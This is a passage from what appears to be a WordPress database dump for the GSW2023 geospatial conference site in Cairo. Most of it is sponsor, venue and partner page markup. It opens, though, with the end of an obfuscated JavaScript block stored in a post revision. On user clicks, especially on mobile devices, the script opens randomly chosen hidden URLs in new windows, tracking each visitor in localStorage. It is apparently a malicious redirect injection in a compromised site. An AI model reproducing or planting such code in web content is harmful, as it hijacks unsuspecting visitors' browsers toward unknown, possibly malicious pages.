|maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:33:45','2023-08-16 00:33:45','',3066,'https://gsw2023.com/?p=5265',0,'revision','',0),
(5266,1,'2023-08-16 00:35:23','2023-08-16 00:35:23','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_column_text]</p>\n<h6 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Platinum Sponsors</strong></span></h6>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144968858{margin-top: 20px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144942219{margin-top: -100px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #000000;\"><strong>Gold </strong></span><span style=\"color: #000000;\"><strong> Sponsors</strong></span></span></p>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145343386{margin-top: -130px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145428379{margin-top: 60px !important;}\"]</p>\n<h3 style=\"text-align: center;\"></h3>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: 